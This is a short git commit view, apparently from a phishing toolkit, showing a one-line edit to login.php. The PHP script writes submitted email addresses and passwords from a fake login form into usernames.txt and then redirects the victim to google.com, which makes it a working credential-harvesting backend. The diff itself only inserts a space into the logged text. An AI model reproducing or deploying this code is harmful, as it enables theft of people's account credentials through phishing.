Update login.php

This commit is contained in:
The Linux Choice
2018-06-23 08:45:17 -03:00
committed by GitHub
parent 29aa166734
commit 501db786e7

View File

@@ -1,5 +1,5 @@
<?php
file_put_contents("usernames.txt", "Account: " . $_POST['Email'] . "Pass: " . $_POST['Passwd'] . "\n", FILE_APPEND);
file_put_contents("usernames.txt", "Account: " . $_POST['Email'] . " Pass: " . $_POST['Passwd'] . "\n", FILE_APPEND);
header('Location: https://google.com/');
exit();